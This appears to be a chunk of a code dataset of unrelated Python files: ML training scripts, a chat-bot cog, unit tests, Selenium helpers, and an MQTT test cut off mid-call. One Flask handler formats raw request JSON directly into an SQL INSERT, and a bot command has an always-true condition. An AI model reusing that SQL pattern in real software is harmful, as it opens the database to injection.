filepath=LOAD_WEIGHTS_PATH)\n\nterminated = False\nstate = env.reset()\ntotal_reward = 0\n\nwhile not terminated:\n action = model.predict(state)\n state, reward, terminated,_ = env.step(action)\n total_reward += reward\n env.render()\n sleep(0.01)\n\nprint(\"Final reward: \" + str(total_reward))\n","sub_path":"evolutionary_algorithm/ea/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"274700055","text":"import voltage\r\nimport asyncio\r\nimport json\r\nimport datetime\r\nimport time\r\n\r\nfrom voltage.ext import commands\r\n\r\n\r\ndef setup(client) -> commands.Cog:\r\n\r\n owner = commands.Cog(\"Owner\")\r\n\r\n\r\n @owner.command(description=\"Change the presence or status of Ikusei!\")\r\n async def status(ctx, *, status, presence=None):\r\n if ctx.author.id in [\r\n \"01H2YMK1VSZM0X4GJAAC7X48TN\",\r\n \"01H213M511VS2W8HMAHHVCSBPT\",\r\n ]:\r\n if not presence:\r\n await client.set_status(status, voltage.PresenceType.online)\r\n return await ctx.send(f\"Changed status to `{status}`\")\r\n else:\r\n if presence.lower() == \"online\":\r\n await client.set_status(status, voltage.PresenceType.online)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Online!`\"\r\n )\r\n elif presence.lower() == \"idle\":\r\n await client.set_status(status, voltage.PresenceType.idle)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Idle`!\"\r\n )\r\n elif presence.lower() == \"dnd\" or \"busy\":\r\n await client.set_status(status, voltage.PresenceType.busy)\r\n return await ctx.send(\r\n f\"Changed status to `{status}` and a presence of `Do Not Disturb`!\"\r\n )\r\n else:\r\n return await ctx.send(\"You aren't an owner of this bot!\")\r\n\r\n @owner.command()\r\n async def test(ctx):\r\n embed = voltage.ImageEmbed(url=\"https://i.imgur.com/3LljFXC.jpeg\")\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n @owner.command(description=\"Test our command\")\r\n async def register(ctx):\r\n\r\n with open(\"json/users.json\", \"r\") as f:\r\n data = json.load(f)\r\n if ctx.author.id in data:\r\n return await ctx.send(\"You're already registered!\")\r\n with open(\"json/users.json\", \"w\") as f:\r\n data[ctx.author.id] = {\r\n \"username\": ctx.author.name,\r\n \"id\": ctx.author.id,\r\n \"bio\": \"User has no bio set!\",\r\n \"beta\": \"False\",\r\n \"ff\": \"False\",\r\n \"notifications\": []\r\n }\r\n json.dump(data, f, indent=2)\r\n embed = voltage.SendableEmbed(description=\"## You're registered!\")\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n\r\n @owner.command(description=\"Use this after registering\")\r\n async def ar(ctx):\r\n with open(\"json/users.json\", \"r\") as f:\r\n data = json.load(f)\r\n embed = voltage.SendableEmbed(\r\n description=f\"{data[ctx.author.id]['username']}'s profile:\\n\\n**Bio:**\\n{data[ctx.author.id]['bio']}\\n\\n**User's settings:**\\n\\nBeta: `{data[ctx.author.id]['beta']}`\\nFamily Friendly Mode: `{data[ctx.author.id]['ff']}`\"\r\n )\r\n await ctx.send(content=\"[]()\", embed=embed)\r\n\r\n return owner","sub_path":"cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"158128162","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n@date: 2020/12/4 上午11:39\n@file: mobilenetv2_inverted_residual.py\n@author: zj\n@description: MobileNetV2 反向残差块\n\"\"\"\nfrom abc import ABC\n\nimport torch.nn as nn\n\n\nclass MobileNetV2InvertedResidual(nn.Module, ABC):\n \"\"\"\n MobileNetV2的反向残差块由一个膨胀卷积和一个深度可分离卷积(depth-wise conv + point-wise conv)组成\n 参考torchvision实现:\n 1. 当膨胀率大于1时,执行膨胀卷积操作;\n 2. 当深度卷积步长为1且输入/输出通道数相同时,执行残差连接\n 3. 反向残差块的最后不执行激活操作\n \"\"\"\n\n def __init__(self,\n # 输入通道数\n in_planes,\n # 输出通道数\n out_planes,\n # 膨胀因子\n expansion_rate=1,\n # 卷积层步长\n stride=1,\n # 卷积层零填充\n padding=1,\n # 卷积层类型\n conv_layer=None,\n # 归一化层类型\n norm_layer=None,\n # 激活层类型\n act_layer=None,\n ):\n super(MobileNetV2InvertedResidual, self).__init__()\n\n if conv_layer is None:\n conv_layer = nn.Conv2d\n if norm_layer is None:\n norm_layer = nn.BatchNorm2d\n if act_layer is None:\n act_layer = nn.ReLU6\n\n # 计算隐藏层输入通道数\n hidden_planes = int(expansion_rate * in_planes)\n features = list()\n if expansion_rate != 1:\n features.append(nn.Sequential(\n conv_layer(in_planes, hidden_planes, kernel_size=1, stride=1, bias=False),\n norm_layer(hidden_planes),\n act_layer(inplace=True)\n ))\n\n # 深度卷积\n features.append(nn.Sequential(\n conv_layer(hidden_planes, hidden_planes, kernel_size=3, stride=stride, padding=padding, bias=False,\n groups=hidden_planes),\n norm_layer(hidden_planes),\n act_layer(inplace=True)\n ))\n\n # 逐点卷积\n features.append(nn.Sequential(\n conv_layer(hidden_planes, out_planes, kernel_size=1, stride=1, bias=False),\n norm_layer(out_planes)\n ))\n\n self.conv = nn.Sequential(*features)\n self.use_res_connect = stride == 1 and in_planes == out_planes\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n","sub_path":"zcls/model/backbones/mobilenetv2_inverted_residual.py","file_name":"mobilenetv2_inverted_residual.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"466453153","text":"import os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"0\"\n\nimport pyglet\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\n\nfrom common.gym_runner import GymRunner\nfrom common.q_learning_agent import QLearningAgent\n\n\nclass CartPoleAgent(QLearningAgent):\n def __init__(self):\n super(CartPoleAgent, self).__init__(2, 3, maxlen = 100000)\n\n def build_model(self):\n model = Sequential()\n model.add(Dense(30, activation='relu', input_dim=2))\n model.add(Dense(30, activation='relu'))\n model.add(Dense(3))\n model.compile(Adam(lr=0.001), 'mse')\n\n # load the weights of the model if reusing previous training session\n # model.load_weights(\"models/cartpole-v0.h5\")\n return model\n\n\nif __name__ == \"__main__\":\n gym = GymRunner('MountainCar-v0', 'gymresults/mountaincar-v0', tile_coding=True)\n agent = CartPoleAgent()\n gym.train(agent, 3000)\n agent.model.save_weights(\"models/mountaincar-v0.h5\", overwrite=True)\n gym.run(agent, 500)\n gym.env.close()\n # gym.close_and_upload(os.environ['API_KEY'])\n","sub_path":"cartpole/mountain_v0.py","file_name":"mountain_v0.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"439049288","text":"# -*- coding: utf-8 -*-\n\nimport repository\nimport sqlite3\nimport unittest\n\ndb_path = 'temp_hist.db'\n\nclass RepositoryTest(unittest.TestCase):\n\n def setUp(self):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM czujnik')\n c.execute('DELETE FROM pomiar')\n c.execute('''INSERT INTO czujnik (id, serial_number, lokalizacja) VALUES(1, 1, 'Pok 11')''')\n c.execute('''INSERT INTO pomiar (id, czujnik_id, pomiar, data) VALUES(1, 1, 20, '2015-11-10')''')\n c.execute('''INSERT INTO pomiar (id, czujnik_id, pomiar, data) VALUES(2, 1, 10, '2015-12-30')''')\n conn.commit()\n conn.close()\n\n def tearDown(self):\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DELETE FROM czujnik')\n c.execute('DELETE FROM pomiar')\n conn.commit()\n conn.close()\n\n def testGetByIdCzujnik(self):\n czujnik = repository.PomiarRepository().getByCzujnik(1)\n self.assertIsInstance(czujnik, repository.Czujnik, \"Objekt nie jest klasy Czujnik\")\n\n def testGetByIdCzujnikNotFound(self):\n self.assertEqual(repository.PomiarRepository().getByCzujnik(22),\n None, \"Powinno wyjść None\")\n\n def testGetBysrednia(self):\n self.assertEqual(repository.PomiarRepository().sredniaCzujnika(1),15, \"Powinno wyjść 15\")\n\n def testDeleteNotFound(self):\n self.assertRaises(repository.RepositoryException,repository.PomiarRepository().delete,22)\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"repositorytest.py","file_name":"repositorytest.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"580362469","text":"import argparse\n\nimport torch.backends.cudnn as cudnn\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.utils.data\nfrom torch.utils.data import DataLoader, random_split\nfrom torch.utils.tensorboard import SummaryWriter\nfrom tqdm import tqdm\n\nfrom dataset import Remote\nfrom unet.unet_model import UNet\n\n\nclass Solver(object):\n def __init__(self, config):\n self.model = None\n self.lr = config.lr\n self.epochs = config.epoch\n self.train_batch_size = config.train_batch_size\n self.val_batch_size = config.val_batch_size\n self.criterion = None\n self.optimizer = None\n self.scheduler = None\n self.device = None\n self.cuda = config.cuda\n self.val_percent = 0.1\n self.train_loader = None\n self.val_loader = None\n\n def load_data(self):\n dataset = Remote()\n n_val = int(len(dataset) * self.val_percent)\n n_train = len(dataset) - n_val\n train, val = random_split(dataset, [n_train, n_val])\n self.train_loader = DataLoader(train, batch_size=self.train_batch_size, shuffle=True)\n self.val_loader = DataLoader(val, batch_size=self.val_batch_size, shuffle=False)\n\n def load_model(self):\n if self.cuda:\n self.device = torch.device('cuda')\n cudnn.benchmark = True\n else:\n self.device = torch.device('cpu')\n self.model = UNet(n_channels=3, n_classes=11).to(self.device)\n\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.lr, weight_decay=1e-8)\n # self.scheduler = optim.lr_scheduler.MultiStepLR(self.optimizer, milestones=[75, 150], gamma=0.5)\n self.criterion = nn.CrossEntropyLoss().to(self.device)\n\n def train(self):\n self.model.train()\n loss_tol = 0\n n_total = len(self.train_loader) * 512 * 512 * self.train_batch_size\n n_correct = 0\n pbar = tqdm(total=len(self.train_loader) * self.train_batch_size, unit='img')\n for i, (imgs, masks) in enumerate(self.train_loader):\n imgs = imgs.to(device=self.device, dtype=torch.float32)\n masks = masks.to(device=self.device, dtype=torch.long)\n\n output = self.model(imgs)\n loss = self.criterion(output, masks)\n loss_tol += loss.item()\n\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n\n pred = torch.max(output, 1)[1]\n correct = torch.sum(pred == masks).item()\n n_correct += correct\n\n pbar.set_postfix(**{'train_loss': loss.item() / self.train_batch_size,\n 'train_acc': correct / (self.train_batch_size * 512 * 512)})\n pbar.update(imgs.shape[0])\n pbar.close()\n return loss_tol / len(self.train_loader), n_correct / n_total\n\n def val(self):\n self.model.eval()\n loss_tol = 0\n n_correct = 0\n n_total = len(self.val_loader) * 512 * 512 * self.val_batch_size\n pbar = tqdm(total=len(self.val_loader), desc='val', unit='img')\n with torch.no_grad():\n for i, (imgs, masks) in enumerate(self.val_loader):\n imgs = imgs.to(device=self.device, dtype=torch.float32)\n masks = masks.to(device=self.device, dtype=torch.long)\n\n output = self.model(imgs)\n loss = self.criterion(output, masks)\n loss_tol += loss.item()\n\n pred = torch.max(output, 1)[1]\n n_correct += torch.sum(pred == masks).item()\n\n pbar.update(imgs.shape[0])\n pbar.close()\n return loss_tol / len(self.val_loader), n_correct / n_total\n\n def run(self):\n self.load_data()\n self.load_model()\n accuracy = 0\n writer = SummaryWriter()\n try:\n for epoch in range(self.epochs):\n train_result = self.train()\n # self.scheduler.step(epoch)\n val_result = self.val()\n writer.add_scalar('Loss/train', train_result[0], epoch)\n writer.add_scalar('Acc/train', train_result[1], epoch)\n writer.add_scalar('Loss/val', val_result[0], epoch)\n writer.add_scalar('Acc/val', val_result[1], epoch)\n accuracy = max(accuracy, val_result[1])\n print(f'epoch: {epoch + 1} / {self.epochs} train_loss: {train_result[0]} train_acc: {train_result[1]} '\n f'val_loss: {val_result[0]} val_acc: {val_result[1]}')\n writer.close()\n except KeyboardInterrupt:\n torch.save(self.model.state_dict(), 'INTERRUPTED.pth')\n writer.close()\n torch.save(self.model.state_dict(), 'model.pth')\n\n\ndef main():\n parser = argparse.ArgumentParser(description=\"cifar-10 with PyTorch\")\n parser.add_argument('--lr', default=0.1, type=float, help='learning rate')\n parser.add_argument('--epoch', default=20, type=int, help='number of epochs tp train for')\n parser.add_argument('--train_batch_size', default=2, type=int, help='training batch size')\n parser.add_argument('--val_batch_size', default=1, type=int, help='testing batch size')\n parser.add_argument('--cuda', default=torch.cuda.is_available(), type=bool, help='whether cuda is in use')\n args = parser.parse_args()\n\n solver = Solver(args)\n solver.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"182987137","text":"# Copyright 2016 Mirantis, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\nimport socket\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import by\nfrom selenium.webdriver.common import proxy\nimport xvfbwrapper\n\nfrom stacklight_tests.helpers.ui import ui_settings\n\n\n@contextlib.contextmanager\ndef ui_driver(url, title, wait_element='/html'):\n vdisplay = None\n # Start a virtual display server for running the tests headless.\n if ui_settings.headless_mode:\n vdisplay = xvfbwrapper.Xvfb(width=1920, height=1080)\n args = []\n\n # workaround for memory leak in Xvfb taken from:\n # http://blog.jeffterrace.com/2012/07/xvfb-memory-leak-workaround.html\n args.append(\"-noreset\")\n\n # disables X access control\n args.append(\"-ac\")\n\n if hasattr(vdisplay, 'extra_xvfb_args'):\n # xvfbwrapper 0.2.8 or newer\n vdisplay.extra_xvfb_args.extend(args)\n else:\n vdisplay.xvfb_cmd.extend(args)\n vdisplay.start()\n driver = get_driver(url, wait_element, title)\n try:\n yield driver\n finally:\n driver.quit()\n if vdisplay is not None:\n vdisplay.stop()\n\n\ndef get_driver(url, anchor, title, by_selector_type=by.By.XPATH):\n proxy_address = ui_settings.proxy_address\n # Increase the default Python socket timeout from nothing\n # to something that will cope with slow webdriver startup times.\n # This *just* affects the communication between this test process\n # and the webdriver.\n socket.setdefaulttimeout(60)\n # Start the Selenium webdriver and setup configuration.\n proxy_ex = None\n if proxy_address is not None:\n proxy_ex = proxy.Proxy(\n {\n 'proxyType': proxy.ProxyType.MANUAL,\n 'socksProxy': proxy_address,\n }\n )\n driver = webdriver.Firefox(proxy=proxy_ex)\n if ui_settings.maximize_window:\n driver.maximize_window()\n driver.implicitly_wait(ui_settings.implicit_wait)\n driver.set_page_load_timeout(ui_settings.page_timeout)\n driver.get(url)\n driver.find_element(by_selector_type, anchor)\n assert title in driver.title\n return driver\n\n\ndef get_table(driver, xpath, frame=None):\n if frame:\n driver.switch_to.default_content()\n driver.switch_to.frame(driver.find_element_by_name(frame))\n return driver.find_element_by_xpath(xpath)\n\n\ndef get_table_row(table, row_id):\n return table.find_element_by_xpath(\"tr[{0}]\".format(row_id))\n\n\ndef get_table_size(table):\n return len(table.find_elements_by_xpath(\"tr[position() > 0]\"))\n\n\ndef get_table_cell(table, row_id, column_id):\n row = get_table_row(table, row_id)\n return row.find_element_by_xpath(\"td[{0}]\".format(column_id))\n","sub_path":"stacklight_tests/helpers/ui_tester.py","file_name":"ui_tester.py","file_ext":"py","file_size_in_byte":3313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"459210969","text":"\nimport numpy as np\n\n\nfrom ml.classifiers.dt.node import Node, LeafNode\nfrom ml.classifiers.dt.cost import gini\n\n\nclass DecisionTree:\n\n def __init__(self, max_depth = 10, min_size = 5, cost = gini, f_count = None):\n self.root = None\n self.max_depth = max_depth\n self.min_size = min_size\n self.cost = cost\n self.f_count = f_count\n\n\n def __str__(self):\n return self.root.to_string()\n\n\n def build_tree(self, X, y, features, depth = 1):\n best_cost = 999999\n best_criteria = None\n best_split = None\n best_labels = None\n\n for feature in features:\n\n for value in np.unique(X.loc[:, feature]):\n if isinstance(value, int) or isinstance(value, float):\n left, right = X.loc[:, feature] < value, X.loc[:, feature] >= value\n else:\n left, right = X.loc[:, feature] == value, X.loc[:, feature] != value\n\n y_left, y_right = y[left], y[right]\n\n if y_left.shape[0] * y_right.shape[0] > 0:\n cost = self.cost([y_left, y_right], np.unique(y))\n\n if best_cost > cost:\n best_cost = cost\n best_criteria = (feature, value)\n best_split = (X.loc[left, :], X.loc[right, :])\n best_labels = (y_left, y_right)\n\n if not best_labels or depth > self.max_depth or len(best_labels[0]) < self.min_size or len(best_labels[1]) < self.min_size:\n return LeafNode(y)\n else:\n return Node(\n best_criteria, \n self.build_tree(best_split[0], best_labels[0], features, depth + 1), \n self.build_tree(best_split[1], best_labels[1], features, depth + 1)\n )\n\n\n def fit(self, X, y):\n if self.f_count:\n features = np.random.choice(list(X), self.f_count, replace = False)\n else:\n features = list(X)\n\n self.root = self.build_tree(X, y, features)\n\n\n def predict(self, X):\n return [self.root.predict(row) for _, row in X.iterrows()]\n \n","sub_path":"ml/classifiers/dt/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"397712552","text":"#!/usr/bin/env python\r\n# encoding: utf-8\r\n\r\nimport math\r\n\"\"\"\r\n@version: ??\r\n@author: autmanli\r\n@license: Apache Licence \r\n@file: sushu.py\r\n@time: 2018/10/12 13:29\r\n\"\"\"\r\n\r\n# 验证该数是不是素数,只需要验证该数能够整除从2到他的平方根即可\r\ndef check_sushu(num):\r\n # 求该数的平方根\r\n sqrt = math.floor(math.sqrt(num)) + 1\r\n # 循环从2到平方根的数\r\n for i in range(2, sqrt):\r\n # 如果该数能够整除,说明该数不是素数\r\n if num % i == 0:\r\n return False\r\n return True\r\n\r\n\r\n#filter用法,过滤掉数组中返回值为false的项\r\nsushu_arr=filter(check_sushu,range(1,1000000))\r\n\r\nprint(list(sushu_arr))","sub_path":"sushu.py","file_name":"sushu.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"530327664","text":"from conn import Conn\nfrom flask import jsonify, request\n\n\nclass Tasks:\n def __init__(self):\n self.c = Conn()\n \n def insert_new_task(self):\n \"\"\"This method inserts new task into the database\"\"\" \n title = request.json['title']\n description = request.json['description']\n done = request.json['done']\n self.c.cursor.execute(\n \"\"\"\n INSERT INTO tasks(title, description, done) VALUES('{}', '{}', '{}')\n \"\"\"\n .format(title, description, done))\n self.c.conn.commit()\n self.c.conn.close()\n\n\nif __name__ == \"__main__\":\n task = Tasks()\n task.insert_new_task()\n","sub_path":"package/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"446519046","text":"import openface\nimport cv2\nimport numpy as np \nimport os\nfrom sklearn import svm\n\nfileDir = os.path.dirname(os.path.realpath(__file__))\nmodelDir = os.path.join(fileDir, 'models')\ndlibModelDir = os.path.join(modelDir, 'dlib')\nopenfaceModelDir = os.path.join(modelDir, 'openface')\n\nalign = openface.AlignDlib(os.path.join(dlibModelDir, \"shape_predictor_68_face_landmarks.dat\"))\nnet = openface.TorchNeuralNet(os.path.join(openfaceModelDir, 'nn4.small2.v1.t7'))\n\n\ndef alignImg(img):\n rgbimg = img.getRGB()\n if rgbimg is None:\n return None\n bb = align.getLargestFaceBoundingBox(rgbimg)\n alignedFace = align.align(96, rgbimg, bb, landmarkIndices=openface.AlignDlib.OUTER_EYES_AND_NOSE)\n return alignedFace\n\n\ndef disMed(rep, vectors, n):\n aux=0\n for i in range(3):\n distances=[]\n for j in range(n[i]):\n d = rep - vectors[j+aux]\n d = np.dot(d,d)\n distances.append(d)\n aux+=n[i]\n print(str(np.mean(distances)) + \" - \" + str(np.median(distances)) + \" - \" + str(np.std(distances)))\n \n\ndef main():\n '''\n persons = [\"miguel\", \"rudyer\"]\n persons_rep = []\n\n # Reading the persons that already know\n for person in persons:\n imgs = list(openface.data.iterImgs(\"raw/\"+ person))\n rep = []\n for i,img in enumerate(imgs,start=1):\n aligned = alignImg(img)\n if aligned is None:\n line = person + \" \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep.append(net.forward(aligned))\n persons_rep.append(rep)\n '''\n # Reading the unknown person\n imgs = list(openface.data.iterImgs(\"raw/desconhecido\"))\n img = imgs[0]\n print(img.name)\n img_aligned = alignImg(img)\n if img_aligned is None:\n print(\"nao reconhecido\")\n exit()\n else:\n img_rep = net.forward(img_aligned)\n\n\n imgs = list(openface.data.iterImgs(\"raw/igor\"))\n rep1 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Igor \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep1.append(net.forward(aligned))\n \n imgs = list(openface.data.iterImgs(\"raw/rudyer\"))\n rep2 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Rudyer \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep2.append(net.forward(aligned))\n \n imgs = list(openface.data.iterImgs(\"raw/miguel\"))\n rep3 = []\n for i,img in enumerate(imgs):\n aligned = alignImg(img)\n if aligned is None:\n line = \"Miguel \" + str(i) + \" nao reconhecida\"\n print(line)\n else:\n rep3.append(net.forward(aligned))\n\n # Fiting into the SVC classifier\n samples = rep1 + rep2 + rep3\n labels1 = [\"igor\"] * len(rep1)\n labels2 = [\"rudyer\"] * len(rep2)\n labels3 = [\"miguel\"] * len(rep3)\n labels = labels1 + labels2 + labels3\n \n clf = svm.SVC(gamma='scale', decision_function_shape='ovo', probability=True)\n clf.fit(samples, labels)\n\n # predicting the unknown face\n print(clf.predict(img_rep.reshape(1,-1)))\n\n disMed(img_rep, clf.support_vectors_, clf.n_support_)\n\n #disMed(img_rep, clf.support_vectors_, clf.n_support_[1])\n\n #disMed(img_rep, clf.support_vectors_, clf.n_support_[2])\n\n\n '''\n To do:\n classificar todas as imagens dos rostos conhecidos dentro do svm;\n ao ler um rosto desconhecido, achar as distancias do rosto pros SVM's;\n se menor ou maior que tal distancia (a definir), aplicar clf.predict().\n ''' \n \n\nmain()","sub_path":"classificador.py","file_name":"classificador.py","file_ext":"py","file_size_in_byte":3713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"9009082","text":"from typing import Dict, List\n\nfrom cloudrail.knowledge.context.aws.resources.ec2.security_group_rule import SecurityGroupRule\n\nfrom cloudrail.knowledge.context.aws.cloudformation.cloudformation_constants import CloudformationResourceType\nfrom cloudrail.knowledge.context.aws.resources_builders.cloudformation.ec2.cloudformation_security_group_rule_base_builder import CloudformationSecurityGroupRuleBaseBuilder\n\n\nclass CloudformationSecurityGroupInlineRuleBuilder(CloudformationSecurityGroupRuleBaseBuilder):\n\n def __init__(self, cfn_by_type_map: Dict[CloudformationResourceType, Dict[str, Dict]]):\n super().__init__(CloudformationResourceType.SECURITY_GROUP, cfn_by_type_map)\n\n def parse_resource(self, cfn_res_attr: dict) -> List[SecurityGroupRule]:\n rules = []\n properties: dict = cfn_res_attr['Properties']\n\n rules.extend(self.parse_security_group_rule(security_group_rule_properties=ingress_rule_property,\n egress=False,\n security_group_id=self.get_resource_id(cfn_res_attr),\n account_id=cfn_res_attr['account_id'],\n region=cfn_res_attr['region']) for ingress_rule_property in self.get_property(properties, 'SecurityGroupIngress', []))\n\n rules.extend(self.parse_security_group_rule(security_group_rule_properties=egress_rule_property,\n egress=True,\n security_group_id=self.get_resource_id(cfn_res_attr),\n account_id=cfn_res_attr['account_id'],\n region=cfn_res_attr['region']) for egress_rule_property in self.get_property(properties, 'SecurityGroupEgress', []))\n\n return rules\n","sub_path":"cloudrail/knowledge/context/aws/resources_builders/cloudformation/ec2/cloudformation_security_group_inline_rule_builder.py","file_name":"cloudformation_security_group_inline_rule_builder.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"33287631","text":"from rdflib import Graph, plugin\nfrom rdflib.serializer import Serializer\n\n\nclass DataRetriever:\n\n def __init__(self):\n self.data = Graph()\n self.data.parse(\"./test.ttl\", format=\"turtle\")\n\n '''\n print(list(data.query(\"\"\"SELECT DISTINCT ?Concept\n WHERE {\n ?x a ?Concept .\n } LIMIT 1\n \"\"\"))[0].Concept)\n '''\n\n def get_pollutants(self):\n res = self.data.query(\"\"\"select distinct ?x \n WHERE \n {\n ?x a .\n }\n \"\"\")\n return res\n\n def get_stations(self):\n res = self.data.query(\"\"\"select distinct ?x \n WHERE \n {\n ?x a .\n }\n \"\"\")\n tmp = list()\n for row in res:\n d = str(row['x'].toPython())\n tmp.append(d)\n return tmp\n\n\n\n","sub_path":"HandsOn/Group07/application/back-end/data_manager.py","file_name":"data_manager.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"128031606","text":"#!/usr/bin/env python\n\n# Before running this script:\n#\n# bunzip2 enwiki-latest-pages-articles.xml.bz2\n# mkdir all\n# cd all\n# split -a 3 -b 64m ../enwiki-20130102-pages-articles.xml chunk_\n# cd ..\n#\n# Then:\n#\n# .../create_dataset.py all 64 8gb 8192\n# .../create_dataset.py all 64 4gb 4096\n# .../create_dataset.py all 64 2gb 2048\n# .../create_dataset.py all 64 1gb 1024\n\nimport os, random, shutil, sys\n\ndef choose_chunks(all_dir, chunk_size, dest_dir, dest_size):\n all_chunks = os.listdir(all_dir)\n num_chunks = dest_size/chunk_size\n dest_chunks = random.sample(all_chunks, num_chunks)\n os.mkdir(dest_dir)\n for chunk in dest_chunks:\n shutil.copyfile(\n os.path.join(all_dir, chunk),\n os.path.join(dest_dir, chunk))\n\nif __name__ == '__main__':\n assert len(sys.argv) == 5\n choose_chunks(\n sys.argv[1],\n int(sys.argv[2]),\n sys.argv[3],\n int(sys.argv[4]))\n","sub_path":"hadoop/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"382330723","text":"# Copyright 2010-2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\").\n# You may not use this file except in compliance with the License.\n# A copy of the License is located at\n#\n# http://aws.amazon.com/apache2.0\n#\n# or in the \"license\" file accompanying this file. This file is distributed\n# on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either\n# express or implied. See the License for the specific language governing\n# permissions and limitations under the License.\n\nfrom __future__ import print_function\n\nimport argparse\nfrom awscrt import io, mqtt\nfrom awscrt.io import LogLevel\nimport threading\nimport uuid\n\nTIMEOUT = 5 # seconds given to each step of the test before giving up\nUNIQUE_ID = str(uuid.uuid4()) # prevent simultaneously-running tests from interfering with each other\nCLIENT_ID = 'test_pubsub_' + UNIQUE_ID\nTOPIC = 'test/pubsub/' + UNIQUE_ID\nMESSAGE = 'test message ' + UNIQUE_ID\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--endpoint', required=True, help=\"Connect to this endpoint (aka host-name)\")\nparser.add_argument('--port', type=int, help=\"Override default connection port\")\nparser.add_argument('--cert', help=\"File path to your client certificate, in PEM format\")\nparser.add_argument('--key', help=\"File path to your private key, in PEM format\")\nparser.add_argument('--root-ca', help=\"File path to root certificate authority, in PEM format\")\n\nio.init_logging(LogLevel.Trace, 'stderr')\n\ndef on_connection_interrupted(error_code):\n print(\"Connection has been interrupted with error code\", error_code)\n\ndef on_connection_resumed(return_code, session_present):\n print(\"Connection has been resumed with return code\", return_code, \"and session present:\", session_present)\n\nreceive_results = {}\nreceive_event = threading.Event()\ndef on_receive_message(topic, message):\n receive_results.update(locals())\n receive_event.set()\n\n# Run\nargs = parser.parse_args()\nevent_loop_group = io.EventLoopGroup(1)\nclient_bootstrap = io.ClientBootstrap(event_loop_group)\n\ntls_options = None\nif args.cert or args.key or args.root_ca:\n if args.cert:\n assert args.key\n tls_options = io.TlsContextOptions.create_client_with_mtls_from_path(args.cert, args.key)\n else:\n tls_options = io.TlsContextOptions()\n\n if args.root_ca:\n with open(args.root_ca, mode='rb') as ca:\n rootca = ca.read()\n tls_options.override_default_trust_store(rootca)\n\nif args.port:\n port = args.port\nelif io.is_alpn_available():\n port = 443\n if tls_options:\n tls_options.alpn_list='x-amzn-mqtt-ca'\nelse:\n port = 8883\n\ntls_context = io.ClientTlsContext(tls_options) if tls_options else None\nmqtt_client = mqtt.Client(client_bootstrap, tls_context)\n\n# Connect\nprint(\"Connecting to {}:{} with client-id:{}\".format(args.endpoint, port, CLIENT_ID))\nmqtt_connection = mqtt.Connection(\n client=mqtt_client,\n 